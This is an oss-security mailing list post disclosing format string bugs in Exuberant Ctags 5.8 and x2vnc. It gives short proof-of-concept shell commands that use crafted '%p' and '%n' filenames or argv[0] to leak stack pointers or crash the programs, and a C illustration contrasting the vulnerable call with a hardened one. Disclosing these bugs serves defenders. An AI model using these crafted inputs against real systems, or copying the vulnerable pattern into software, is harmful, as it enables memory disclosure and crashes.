
List:       oss-security
Subject:    [oss-security] Exuberant Ctags and x2vpn format string vulnerabilities
From:       Jasper Lievisse Adriaanse <j () jasper ! la>
Date:       2020-04-23 13:28:48
Message-ID: CDC3220B-901E-4A8C-B297-C39451934DE0 () jasper ! la

Hello,

I noticed two format string vulnerabilities in Exuberant Ctags and x2vnc, both of these were
fixed back in 2009 and 2012 however they don't appear to have been picked up widely. (Note this
concerns Exuberant Ctags and not Universal Ctags which is a continuation of the former.)

For example the issue in ctags was fixed in 2009 by the original author in the upstream
subversion repository, but a proper release was never made after the affected 5.8 version was
released. Some distributions (most notably Debian, CentOS 8) have switched to distributing a
version based on an svn checkout, whereas others (OpenBSD, FreeBSD, pkgsrc, CentOS < 8,
Homebrew, etc) were still using the actual 5.8 release.

For ctags it can be triggered by specifying an existent but unreadable regex file with the
following proof-of-concept:

$ touch "%p %p"; chmod 000 "%p %p"; ectags --regex-c="@%p %p"
ectags: Warning: 0x0 0x189fa32db1da : Permission denied
ectags: No files specified. Try "ectags --help".
$

Or a simple crasher:

$ touch %n; chmod 000 %n; ectags --regex-c=@%n
ectags: Warning: zsh: segmentation fault (core dumped)  ectags --regex-c=@%n
$

and for x2vnc it relies on overwriting argv[0]:

tau:2011 ctags % ARGV0="%08x %08x" x2vnc localhost:0
00000010 1e950c0a: ConnectToTcpAddr: connect: Connection refused
%08x %08x: unable to connect to VNC server
tau:2012 ctags %

I described some more details in https://blog.jasper.la/poking-old-format-string-bugs.html

I'm posting to this list to make sure other vendors are aware of these issues in ctags and
x2vnc because even though they were fixed in 2009/2012, many vendors are still shipping the
vulnerable code. If CVEs were to be allocated from the 2009 and 2012 ranges for ctags and x2vnc
respectively to make tracking these issues easier, that wouldn't hurt I guess.

Cheers,
Jasper
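The two bugs above share one shape: text an attacker controls (a filename given via --regex-<lang>, or argv[0]) ends up as the format argument of a printf-style call rather than as data. The following is an added illustration, not code from ctags or x2vnc: the vulnerable form is sketched in a comment, the hardened form is compiled, and a small audit helper counts the conversions a string would trigger if it were ever used as a format. The function names and the MSG_MAX size are assumptions for the example.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/*
 * Sketch of the vulnerable form (not compiled here): the message that
 * embeds the untrusted filename is itself handed over as the format.
 *
 *     snprintf(msg, sizeof msg, "%s : %s", filename, strerror(err));
 *     fprintf(stderr, msg);   // msg is the format: "%p" / "%n" are interpreted
 *
 * The hardened form below always supplies a literal format and passes the
 * untrusted string as a "%s" argument, so a name like "%p %p" is printed
 * verbatim instead of reading (or, with "%n", writing) the stack.
 */

#define MSG_MAX 256   /* assumed buffer size for the example */

/* Hardened: the filename is data, never the format. Returns the number of
 * characters that would have been written (excluding the NUL), like snprintf. */
int format_warning(char *out, size_t outlen, const char *filename, int err)
{
    return snprintf(out, outlen, "Warning: %s : %s", filename, strerror(err));
}

/* Audit helper: count '%' conversions in a string. A non-zero result for a
 * string derived from user input that reaches a format parameter is the bug
 * class above; "%%" is a literal percent sign and is not counted. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent: skip the pair */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char buf[MSG_MAX];
    const char *unreadable = "%p %p";   /* constructed: the filename from the PoC */
    format_warning(buf, sizeof buf, unreadable, EACCES);
    printf("%s\n", buf);   /* prints: Warning: %p %p : Permission denied */
    printf("directives in filename: %d\n", count_format_directives(unreadable));
    return 0;
}
```

With -Wformat-security (or -Werror=format-security) the compiler flags the sketched vulnerable call at build time, which is the cheapest way to find remaining instances in a code base that still ships 5.8-era code.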

